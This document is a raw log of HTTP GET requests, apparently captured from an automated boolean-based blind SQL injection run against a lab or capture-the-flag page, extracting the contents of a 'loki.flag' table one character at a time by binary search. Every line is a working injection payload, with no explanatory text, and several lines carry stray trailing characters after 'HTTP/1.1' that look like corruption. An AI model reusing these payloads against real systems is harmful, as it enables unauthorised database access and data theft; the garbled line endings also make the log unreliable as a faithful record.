GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>109 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>98 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>99 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>102 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>101 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>109 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>111 AND '%'='HTTP/1.1c
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>64 AND '%'='HTTP/1.1c"
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>96 AND '%'='HTTP/1.1c#
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>112 AND '%'='HTTP/1.1c&
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>120 AND '%'='HTTP/1.1c'
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>116 AND '%'='HTTP/1.1c*
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>114 AND '%'='HTTP/1.1c+
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>115 AND '%'='HTTP/1.1c.
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>64 AND '%'='HTTP/1.1c.
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>96 AND '%'='HTTP/1.1c1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>80 AND '%'='HTTP/1.1c1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>88 AND '%'='HTTP/1.1c5
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>92 AND '%'='HTTP/1.1c5
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>94 AND '%'='HTTP/1.1c9
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>95 AND '%'='HTTP/1.1c9
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>64 AND '%'='HTTP/1.1c=
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>96 AND '%'='HTTP/1.1c=
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>112 AND '%'='HTTP/1.1cA
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>120 AND '%'='HTTP/1.1cA
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>116 AND '%'='HTTP/1.1cE
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>114 AND '%'='HTTP/1.1cE
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>115 AND '%'='HTTP/1.1cH
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>64 AND '%'='HTTP/1.1cK
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>96 AND '%'='HTTP/1.1cK
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>112 AND '%'='HTTP/1.1cN
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>104 AND '%'='HTTP/1.1cN
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>100 AND '%'='HTTP/1.1cR
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>102 AND '%'='HTTP/1.1cR
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>103 AND '%'='HTTP/1.1cV
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>64 AND '%'='HTTP/1.1cV
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>96 AND '%'='HTTP/1.1cY
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>112 AND '%'='HTTP/1.1c\
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>104 AND '%'='HTTP/1.1c\
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>100 AND '%'='HTTP/1.1c_
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>102 AND '%'='HTTP/1.1c_
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>101 AND '%'='HTTP/1.1cb
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>64 AND '%'='HTTP/1.1ce
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>96 AND '%'='HTTP/1.1cg
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>80 AND '%'='HTTP/1.1cg
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>88 AND '%'='HTTP/1.1cj
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>92 AND '%'='HTTP/1.1cm
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>94 AND '%'='HTTP/1.1cn
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>95 AND '%'='HTTP/1.1cq
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>64 AND '%'='HTTP/1.1cs
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>96 AND '%'='HTTP/1.1cs
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>112 AND '%'='HTTP/1.1cv
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>120 AND '%'='HTTP/1.1cx
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>116 AND '%'='HTTP/1.1cz
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>114 AND '%'='HTTP/1.1c|
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>115 AND '%'='HTTP/1.1c}
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>106 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>107 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>32 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>48 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>40 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>36 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>34 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>33 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>124 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>126 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>125 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>32 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>16 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>8 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>4 AND '%'='HTTP/1.1
